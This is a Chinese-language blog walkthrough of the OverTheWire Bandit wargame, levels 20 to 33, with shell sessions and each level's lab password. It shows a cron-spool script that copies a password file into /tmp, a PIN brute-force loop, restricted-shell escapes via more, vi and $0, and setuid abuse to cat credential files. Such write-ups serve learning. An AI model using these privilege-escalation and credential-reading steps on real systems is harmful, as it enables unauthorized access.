bandit solution(21-34)
Bandit Level 20 → Level 21
Level Goal
There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
NOTE: Try connecting to your own network daemon to see if it works as you think
这一关展示了我的英语水平之低下而浪费了不少时间。根据题目这也是一个setuid二进制文件,这个程序会跟指定的本地端口进行连接读入一行文本并跟当前等级的密码进行比较,如果正确的话就会告诉你下一关的密码。
bandit20@bandit:~$ ls
suconnect
bandit20@bandit:~$ file suconnect
suconnect: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=74c0f6dc184e0412b6dc52e542782f43807268e1, not stripped
bandit20@bandit:~$ ./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side, the next password is transmitted back.
这一关需要用到 nc 的-l选项
-l, --listen (Listen for connections)
Listen for connections rather than connecting to a remote machine
❗❗❗这个选项是监听连接而不是去连接一个远程主机
根据题意,我们需要设置一个端口发送当前密码,然后用本关的程序去连接这个端口来接收当前密码,如果正确的话就会告诉我们下一关密码了。
我用nmap扫了一下已经开放的端口,这是为了寻找空闲的端口,结果太长就不发出来了
bandit20@bandit:~$ echo GbKksEFF4yrVs6il55v6gwY5aVje5f0j | nc -l -p 60001 &
[7] 6923
[5] Exit 1 nc -l -p 60000
bandit20@bandit:~$ ./suconnect 60001
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
密码到手去下一关
Bandit Level 21 → Level 22
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
这一题介绍了cron该程序可以设置其他程序在特定时间执行指定时长。根据题目的提示我们需要去到**/etc/cron.d/**目录
bandit21@bandit:~$
bandit21@bandit:~$ ls
bandit21@bandit:~$ cd /etc/cron.d
bandit21@bandit:/etc/cron.d$ ls -al
total 36
drwxr-xr-x 2 root root 4096 Jul 11 2020 .
drwxr-xr-x 87 root root 4096 May 14 2020 ..
-rw-r--r-- 1 root root 62 May 14 2020 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Jul 11 2020 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 May 7 2020 cronjob_bandit22
-rw-r--r-- 1 root root 122 May 7 2020 cronjob_bandit23
-rw-r--r-- 1 root root 120 May 14 2020 cronjob_bandit24
-rw-r--r-- 1 root root 62 May 14 2020 cronjob_bandit25_root
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
bandit21@bandit:/etc/cron.d$ crontab -h
crontab: invalid option -- 'h'
crontab: usage error: unrecognized option
usage: crontab [-u user] file
crontab [ -u user ] [ -i ] { -e | -l | -r }
(default operation is replace, per 1003.2)
-e (edit user's crontab)
-l (list user's crontab)
-r (delete user's crontab)
-i (prompt before deleting user's crontab)
bandit21@bandit:/etc/cron.d$ crontab -l
crontabs/bandit21/: fopen: Permission denied
没有权限那只能根据文件名来猜测了
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
得知这样的一个shell脚本在后台自带运行并且把所有的输出都丢掉了。我们来看看这个文件
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
根据这段shell得知密码在这个目录
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
密码到手
Bandit Level 22 → Level 23
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
根据提示直接进目录
bandit22@bandit:~$ cd /etc/cron.d && ls -al
total 36
drwxr-xr-x 2 root root 4096 Jul 11 2020 .
drwxr-xr-x 87 root root 4096 May 14 2020 ..
-rw-r--r-- 1 root root 62 May 14 2020 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Jul 11 2020 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 May 7 2020 cronjob_bandit22
-rw-r--r-- 1 root root 122 May 7 2020 cronjob_bandit23
-rw-r--r-- 1 root root 120 May 14 2020 cronjob_bandit24
-rw-r--r-- 1 root root 62 May 14 2020 cronjob_bandit25_root
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
发现cronjob_bandit23非常可疑,我们看一看
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
跟上一题很像,我们把这一段复制运行一遍看看
bandit22@bandit:/tmp$ myname=$(whoami)
bandit22@bandit:/tmp$ mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
bandit22@bandit:/tmp$ echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@bandit:/tmp$ cat /tmp/8169b67bd894ddbb4412f91573b38db3
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
非常开心,密码到手结果登录发现是错的。。。
经过对比发现这个密码跟上一关密码是一样的😋那么在根据代码中的whoami猜测或许跟用户有关?
bandit22@bandit:/tmp$ whoami
bandit22
那么是不是跟bandit23有关呢?我们把bandit22修改成bandit23
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
我们cat这个文件看看吧
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
🆗密码到手
Bandit Level 23 → Level 24
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
看第一个提示我还跑去学了学bash后来发现其实这一关用到的bash知识非常少,不过我还是会放上资料的链接Shell Scripting Tutorial
跟前几关一样快速看看脚本写了啥
bandit23@bandit:~$ cd /etc/cron.d && ls -al
total 36
drwxr-xr-x 2 root root 4096 Jul 11 2020 .
drwxr-xr-x 87 root root 4096 May 14 2020 ..
-rw-r--r-- 1 root root 62 May 14 2020 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Jul 11 2020 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 May 7 2020 cronjob_bandit22
-rw-r--r-- 1 root root 122 May 7 2020 cronjob_bandit23
-rw-r--r-- 1 root root 120 May 14 2020 cronjob_bandit24
-rw-r--r-- 1 root root 62 May 14 2020 cronjob_bandit25_root
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
我们来看看这个目录
bandit23@bandit:/tmp/highway24$ ls /var/spool/$(whoami)
ls: cannot access '/var/spool/bandit23': No such file or directory
并不存在😥这说明运行这个脚本的用户不是bandit23
可能是因为这个脚本被设置了uid使得myname不是bandit23
阅读这段脚本可以得知在/var/spool/$myname下的文件将被执行如果该文件的拥有者是bandit23也就是我们自己,不属于bandit23的文件将被删除。这启发了我们
那么看看这个目录
bandit23@bandit:/tmp/highway24$ ls /var/spool -l
total 12
drwxrwx-wx 23 root bandit24 4096 Jun 22 11:16 bandit24
drwxr-xr-x 3 root root 4096 May 3 2020 cron
lrwxrwxrwx 1 root root 7 May 3 2020 mail -> ../mail
drwx------ 2 root root 4096 Jan 14 2018 rsyslog
看来真正的目录应该是/var/spool/bandit24那么我们只需要写一段脚本放进去等待cron执行即可。
这一点是最难想的,我想你可能还记得之前关卡提到过的/etc/bandit_pass目录吧,存储着所有的密码,我们只需要写一段shell把密码拿到手
但是在shell这里出现了一点问题,按逻辑来说没有问题但就是不对。不懂为啥,所以直接使用了Google出来的
#!/bin/bash
mkdir /tmp/DotSlash
cat /etc/bandit_pass/bandit24 > /tmp/DotSlash/pass.txt
echo password = cat /tmp/DotSlash/pass.txt
尽管这段shell起作用了,但是echo并没有成功,我们得在自己去cat一下。接下来只要赋予这段shell权限然后丢到/var/spool/bandit24里就好了
bandit23@bandit:/tmp/highway24$ chmod 777 myshel24.sh
bandit23@bandit:/tmp/highway24$ cp myshell24.sh /var/spool/bandit24
---------wait a moment-------------
bandit23@bandit:/tmp/highway24$ ls /tmp/DotSlash
pass.txt
bandit23@bandit:/tmp/highway24$ cat /tmp/DotSlash/pass.txt
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
可以看到最后的echo没有输出任何东西,至于为什么,无人知晓。查了也有人出现了类似的问题,至少密码还是能得到的。
Bandit Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
这一关是bash编程的小试牛刀,我反正写的不咋样
根据题目我们需要向30002端口发送一个pingcode范围在0~10000,如此庞大只能通过编程实现自动化了,进入目录
bandit24@bandit:/tmp/highway25$ cd /tmp/highway25
bandit24@bandit:/tmp/highway25$ for ((i=0;i<10000;i++));do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> pingcode.txt;done
bandit24@bandit:/tmp/highway25$ nc localhost -p 30002 < pingcode.txt
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
如果这段shell看不懂的话看下面
#!/bin/sh
for ((i=0;i<10000;i++))
do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> pingcode.txt
done
Bandit Level 25 → Level 26
Level Goal
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
这一关还是学了蛮多东西的,慢慢来看
老步骤
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
Could not create directory '/home/bandit25/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Connection to localhost closed.
这跟之前的一关非常的像对吧?你有没有想到呢?我们测试一下
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey -t echo 1
Could not create directory '/home/bandit25/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Connection to localhost closed.
没有输出,那么回头仔细看看提示。 bandit26的shell不是 /bin/sh 。那么去哪查看shell的目录呢?
在 /etc/passwd 中,这是Linux中一个非常重要的目录Understanding /etc/passwd File Format经过简单的学习开始吧
我们来看看bandit26的shell目录是啥
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
是 /usr/bin/showtext 那么cat一下
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
more ~/text.txt
exit 0
这里有一个more指令,该指令是一个文本过滤器在终端界面足够小到只能显示一行的时候起作用,
more is a filter for paging through text one screenful
at a time.
This version is especially primitive.
Users should realize that less provides more emulation plus
extensive enhancements.
把你的终端界面拉到最小。我们再重新连接一下
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
我们进入到了more里根据more的manual可知v可以启用当前环境的文本编辑器
v
Start up an editor at current line. The editor is taken from
the environment variable VISUAL if defined, or EDITOR if
VISUAL is not defined, or defaults to vi(1) if neither VISUAL
nor EDITOR is defined.
按一下v后进入vim可以使用:e来打开一段文本:e /etc/etc/bandit_pass/bandit26
这一关的密码就到手了5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
但是光有密码也不能登录到下一关,怎么登录到下一关呢?
请看下一关
Bandit Level 26 → Level 27
Level Goal
Good job getting a shell! Now hurry and grab the password for bandit27!
这一关要在上一关的基础上进行,也就是说需要先登录到26关,请继续上一关的环境。我们需要getshell这个在vim中即可设置,因为26关的shell是的目录不太对劲,所以我们需要设置一下,在vim中输入 set shell=/usr/bin
shell回到了它原本的模样,那么我们开始正常使用shell吧
bandit26@bandit:~$ ls
bandit27-do text.txt
cat一下发现不可读,那就file一下发现是setuid的可执行文件,执行一下看看。
至于什么是setuid的可执行文件,之前的20关有学习过。
bandit26@bandit:~$ file bandit27-do
bandit27-do: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8e941f24b8c5cd0af67b22b724c57e1ab92a92a1, not stripped
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id
那么很简单了
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
密码到手,下一关emmmm我们仍未知道那天LV25的密码有什么用(。^▽^)hhh
Bandit Level 27 → Level 28hhh
Level Goalhh
There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo. The password for the user bandit27-git is the same as for the user bandit27.
Clone the repository and find the password for the next level.
这一关非常的简单,只是git的简单使用
bandit27@bandit:~$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
fatal: could not create work tree dir 'repo': Permission denied
bandit27@bandit:~$ ls
bandit27@bandit:~$ pwd
/home/bandit27
bandit27@bandit:~$ file /home/bandit27
/home/bandit27: directory
bandit27@bandit:~$ ls -l /home/bandi27
ls: cannot access '/home/bandi27': No such file or directory
当前目录我们没有权限
bandit27@bandit:/tmp/highway27$ ls -l /home | grep bandit27
drwxr-xr-x 2 root root 4096 May 7 2020 bandit27
drwxr-x--- 3 bandit27-git bandit27-git 4096 Jun 9 10:25 bandit27-git
可以看到出现了bandit27-git目录,很显然与这一关有联系,我们去看一看
bandit27@bandit:~$ cd /home/bandit27-git
-bash: cd: /home/bandit27-git: Permission denied
看不了。这时我想当可以去/tmp目录下clone仓库,那么试一试吧
bandit27@bandit:~$ mkdir /tmp/highway27 && cd /tmp/highway27
bandit27@bandit:/tmp/highway27$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
要输入一次密码,不过题目已经告诉了就是本关的密码直接输入,然后clone完成,看一看都有啥,结果下一关密码就出来了。(●ˇ∀ˇ●)
bandit27@bandit:/tmp/highway27$ ls -l
total 4
drwxr-sr-x 3 bandit27 root 4096 Jun 24 02:47 repo
bandit27@bandit:/tmp/highway27$ ls -l /tmp/highway27/repo
total 4
-rw-r--r-- 1 bandit27 root 68 Jun 24 02:47 README
bandit27@bandit:/tmp/highway27$ cat /tmp/highway27/repo/README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
Bandit Level 28 → Level 29
Level Goal
There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo. The password for the user bandit28-git is the same as for the user bandit28.
Clone the repository and find the password for the next level.
这一关虽然题目跟上面很像,但其实是关于git的简单使用,同样的步骤
bandit28@bandit:~$ ls
bandit28@bandit:~$ ls -l /home | grep bandit28
drwxr-xr-x 2 root root 4096 May 7 2020 bandit28
drwxr-x--- 3 bandit28-git bandit28-git 4096 May 7 2020 bandit28-git
bandit28@bandit:~$ mkdir /tmp/highway28 && cd /tmp/highway28
bandit28@bandit:/tmp/highway28$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
bandit28@bandit:/tmp/highway28$ ls -l
total 4
drwxr-sr-x 3 bandit28 root 4096 Jun 24 03:03 repo
bandit28@bandit:/tmp/highway28$ ls -l /tmp/highway28/repo
total 4
-rw-r--r-- 1 bandit28 root 111 Jun 24 03:03 README.md
bandit28@bandit:/tmp/highway28$ cat /tmp/highway28/repo/README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
但是到这里出现了一点问题
git的简单了解An introduction to Git: what it is, and how to use it学习一下一些git指令,然后再深入地学习看这篇Learn the workings of Git, not just the commands
看完之后才是吧
我们先来看看git的日志
bandit28@bandit:/tmp/highway28/repo$ git log
commit edd935d60906b33f0619605abd1689808ccdd5ee
Author: Morla Porla <morla@overthewire.org>
Date: Thu May 7 20:14:49 2020 +0200
fix info leak
commit c086d11a00c0648d095d04c089786efef5e01264
Author: Morla Porla <morla@overthewire.org>
Date: Thu May 7 20:14:49 2020 +0200
add missing data
commit de2ebe2d5fd1598cd547f4d56247e053be3fdc38
Author: Ben Dover <noone@overthewire.org>
Date: Thu May 7 20:14:49 2020 +0200
initial commit of README.md
下面的是注释,对应的commit在上面,我们看到第一个是初始化commit ,我们来看看吧
bandit28@bandit:/tmp/highway28/repo$ git checkout de2ebe2d5fd1598cd547f4d56247e053be3fdc38
Note: checking out 'de2ebe2d5fd1598cd547f4d56247e053be3fdc38'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:
git checkout -b <new-branch-name>
HEAD is now at de2ebe2... initial commit of README.md
我们现在可以查看这个提交
bandit28@bandit:/tmp/highway28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: <TBD>
看来不对,那就是那个add missing data了
bandit28@bandit:/tmp/highway28/repo$ git checkout c086d11a00c0648d095d04c089786efef5e01264
bandit28@bandit:/tmp/highway28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: bbc96594b4e001778eee9975372716b2
密码到手
Bandit Level 29 → Level 30
Level Goal
There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo. The password for the user bandit29-git is the same as for the user bandit29.
Clone the repository and find the password for the next level.
这一关是关于git的repos的,同样的步骤(省略)
bandit29@bandit:/tmp/highway29$ cd repo && cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: <no passwords in production!>
bandit29@bandit:/tmp/highway29/repo$ git log
commit 208f463b5b3992906eabf23c562eda3277fea912
Author: Ben Dover <noone@overthewire.org>
Date: Thu May 7 20:14:51 2020 +0200
fix username
commit 18a6fd6d5ef7f0874bbdda2fa0d77b3b81fd63f7
Author: Ben Dover <noone@overthewire.org>
Date: Thu May 7 20:14:51 2020 +0200
initial commit of README.md
想当然的没有出现密码。根据之前所学,联想到可能在其他的branch?来看看吧
大部分的wp都是用普通的git branch -a来查看branch然后随意的查看就得到了密码,但是经过搜索有一篇用到的git show-branch --all应该才是真正有用的。
bandit29@bandit:/tmp/highway29/repo$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev
bandit29@bandit:/tmp/highway29/repo$ git show-branch --all
* [master] fix username
! [origin/HEAD] fix username
! [origin/dev] add data needed for development
! [origin/master] fix username
! [origin/sploits-dev] add some silly exploit, just for shit and giggles
-----
+ [origin/dev] add data needed for development
+ [origin/dev^] add gif2ascii
+ [origin/sploits-dev] add some silly exploit, just for shit and giggles
*++++ [master] fix username
根据注释,密码不在production那么可能在development我想这是最大的一个提示,我们选择这个分支看一看吧
bandit29@bandit:/tmp/highway29/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/highway29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.
## credentials
- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf
密码到手
Bandit Level 30 → Level 31
Level Goal
There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo. The password for the user bandit30-git is the same as for the user bandit30.
Clone the repository and find the password for the next level.
这一关用到了git的tag功能, tag能对任何仓库中任何一个指定点做一个标记,并且可以通过-m添加注释信息
这一关有一点神秘,经过多方搜索仍然没有得知原因。
老操作了创建目录然后git clone开始吧
bandit30@bandit:/tmp/highway30/repo$ cat README.md
just an epmty file... muahaha
然后我们看看branch
bandit30@bandit:/tmp/highway30/repo$ git show-branch --all
! [master] initial commit of README.md
! [origin/HEAD] initial commit of README.md
! [origin/master] initial commit of README.md
---
+++ [master] initial commit of README.md
bandit30@bandit:/tmp/highway30/repo$
没有啥值得注意的事情,那么log呢?
bandit30@bandit:/tmp/highway30/repo$ git log
commit 3aefa229469b7ba1cc08203e5d8fa299354c496b
Author: Ben Dover <noone@overthewire.org>
Date: Thu May 7 20:14:54 2020 +0200
initial commit of README.md
也没有。看看tag吧,然后梦开始的地方就到了,如果你不了解什么是tag可以去学习一下2.6 Git Basics - Tagging但是这对解密好像没有啥帮助,因为接下来发生的事情比较诡异
bandit30@bandit:/tmp/highway30/repo$ git tag
secret
然后按照手册,我们checkout一下
bandit30@bandit:/tmp/highway30/repo$ git checkout secret
fatal: reference is not a tree: secret
非常神奇,一个tag居然脱离了某个pointer独立存在。
bandit30@bandit:/tmp/highway30/repo$ git show secret
47e603bb428404d265f59c42920d81e5
而且我们show这个tag自然也不会显示哪些所谓的commit信息了,非常神奇。至于怎么做到的,没有搜到。不过至少答案到手了。
Bandit Level 31 → Level 32
Level Goal
There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo. The password for the user bandit31-git is the same as for the user bandit31.
Clone the repository and find the password for the next level.
这一关是关于git如何提交到远程仓库的
老步骤创建路径并且git clone
bandit31@bandit:/tmp/highway31/repo$ cat README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
🆗开始写文件
bandit31@bandit:/tmp/highway31/repo$ touch key.txt
bandit31@bandit:/tmp/highway31/repo$ vim key.txt
bandit31@bandit:/tmp/highway31/repo$ cat key.txt
May I come in?
然后把key.txt提交到stage区域
bandit31@bandit:/tmp/highway31/repo$ git add key.txt
The following paths are ignored by one of your .gitignore files:
key.txt
Use -f if you really want to add them.
有 .gitignore 阻止了我们,不过没事根据返回结果加一个-f就能强制add
bandit31@bandit:/tmp/highway31/repo$ git add -f key.txt
bandit31@bandit:/tmp/highway31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
(use "git reset HEAD <file>..." to unstage)
new file: key.txt
分支确认在master
接下来就是commit和push
bandit31@bandit:/tmp/highway31/repo$ git commit -m "key"
[master cc87669] key
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/highway31/repo$ git push
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Permission denied, please try again.
bandit31-git@localhost's password:
Counting objects: 3, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 317 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'
密码到手下一关
Bandit Level 32 → Level 33
After all this git stuff its time for another escape. Good luck!
这一关有点靠猜,我们先来看看
WELCOME TO THE UPPERCASE SHELL
>> ls
sh: 1: LS: not found
>> man ls
sh: 1: MAN: not found
可以看出他会把你的指令转换成大写,然后shell就没法执行了。
那么首先想到的思路,有没有大写的指令呢?没有,所以pass
经过Google的一篇wp得知了思路
可以猜想这个大写shell可能是接收输入的第一个参数(根据我的第二个例子可以得知只接收1个参数)然后转换成大写再交给shell执行。
然后这里需要学习$0变量,这是一个非常特殊的变量。
If bash is started with the -c option, then $0 is set to the first argument after the string to be executed, if one is present.
Otherwise, it is set to the file name used to invoke bash, as given by argument zero
What is the meaning of $0 in the Bash shell
那么这个shell应该是这样的
#!/bin/bash
//把参数变成大写
//交给shell
sh -c "$0"
所以我们通过 $0 来执行真正的shell
WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee
终于到最后一关了
Bandit Level 33 → Level 34
At this moment, level 34 does not exist yet.
emmmmm😂😂😂好吧结束了
464
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
